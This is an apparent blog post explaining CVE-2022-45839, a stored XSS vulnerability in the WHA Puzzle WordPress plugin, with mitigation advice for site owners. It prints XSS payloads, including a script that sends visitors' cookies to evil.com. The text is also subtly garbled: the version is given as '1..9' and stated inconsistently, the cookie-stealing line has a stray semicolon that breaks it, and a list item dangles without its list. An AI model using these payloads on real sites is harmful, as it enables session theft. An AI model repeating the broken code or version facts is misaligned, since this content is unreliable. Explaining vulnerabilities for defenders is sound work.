CVE-2022-45839 - Authenticated Stored XSS in WHA Puzzle WordPress Plugin (<= 1..9) – Explained & Exploited

If you run a WordPress website, security should always be a top concern. In today’s post, we’ll take a close look at CVE-2022-45839—an authenticated Stored Cross-Site Scripting (XSS) vulnerability in the popular WHA Puzzle plugin (versions 1..9 and below). We’ll break down what the problem is, why it matters, how it can be exploited, and steps you can take to protect your site. Let’s dive right in.

What is CVE-2022-45839?

CVE-2022-45839 is an XSS vulnerability discovered in the “WHA Puzzle” plugin for WordPress. The bug allows any logged-in user with contributor or higher privileges to inject malicous scripts (JavaScript) that will get stored in the database and executed in the browsers of anyone visiting the affected page.

This means a lower-level contributor (who might normally be limited in their damage potential) could booby-trap the admin’s or visitors’ browsers, steal cookies, deface content, or perform any malicious actions JavaScript allows.

Where’s the bug?

The vulnerable code lies in how WHA Puzzle handles certain settings that contributors can set, but fails to sanitize user input properly. Here’s a simplified breakdown of the vulnerable process, based on the real plugin’s code.

Vulnerable Code Snippet (simplified for learning)

// File: admin/class-wha-puzzle-admin.php

public function save_puzzle() {
    // ... other code ...

    // The plugin takes values from $_POST without proper sanitization
    $puzzle_content = $_POST['wha_puzzle_content'];

    // Problem: content is NOT sanitized before saving
    update_post_meta($post_id, 'wha_puzzle_content', $puzzle_content);

    // ... other code ...
}

When this content is later displayed (e.g., by a shortcode), it is rendered without escaping, so any code the user sneaks into $puzzle_content runs as part of the page. If that code includes <script>, it will execute in the browser of the next person who loads the puzzle on the website.

How the Exploit Works

Any user with contributor permissions or higher (author, editor, admin) can create or edit a puzzle and insert malicious script code.

Suppose an attacker fills the puzzle content with the following

Puzzle: <img src=x onerror="alert('XSS by CVE-2022-45839')">

Or even more dangerous

<script>
    fetch('https://evil.com/steal?cookie='; + document.cookie);
</script>

Now, each time someone (including an admin) visits the puzzle page, the attacker’s JavaScript will run in *their* browser context!

View the page where the puzzle is embedded. The alert or malicious activity will trigger.

Image showing the puzzle content field in the plugin admin panel (for demonstration purposes):  
!WHA Puzzle Admin  
*(Image not real, for illustration only.)*

Phishing: Display fake login forms, tricking users.

- Persistent XSS: Since the payload is stored in the database, it will keep triggering until removed.

Real World Impact

Authenticated XSS bugs like this are especially dangerous on multi-author sites, networks, forums, or any place where contributors are not fully trusted. Attackers don't need full admin power—just a contributor login!

Mitigation & Protection

1. Update the Plugin  
The simplest fix is to upgrade to a patched version of WHA Puzzle once available. If your version is 1..9 or below, you’re at risk.

2. Remove/Disable the Plugin  
If you can’t update, remove or deactivate the plugin until a fix is available.

3. Harden User Roles  
Audit your site. Remove or limit low-trust user accounts with posting privileges.

4. Sanitize Output  
Developers: always sanitize and escape user input before displaying it. Use functions like esc_html() or wp_kses_post() in WordPress.

5. Use a Security Plugin  
Consider something like Wordfence that can block known attack patterns.

Original References

- CVE-2022-45839 at NVD
- WPScan advisory
- WHA Puzzle Plugin on WordPress.org
- Common WordPress XSS Guidance

Conclusion

CVE-2022-45839 in the WHA Puzzle plugin is a serious risk for WordPress sites that use it, especially those with multiple contributors.

If your site runs this plugin below version 1..9, you *must* update, remove, or restrict it now. Never ignore plugin security warnings—today’s seemingly harmless contributor could become tomorrow’s breach point.

Stay patched & stay secure!

*If this helped you, share it with fellow WordPress admins who may not know about this vulnerability yet!*

Timeline

Published on: 04/18/2023 13:15:00 UTC
Last modified on: 04/26/2023 20:30:00 UTC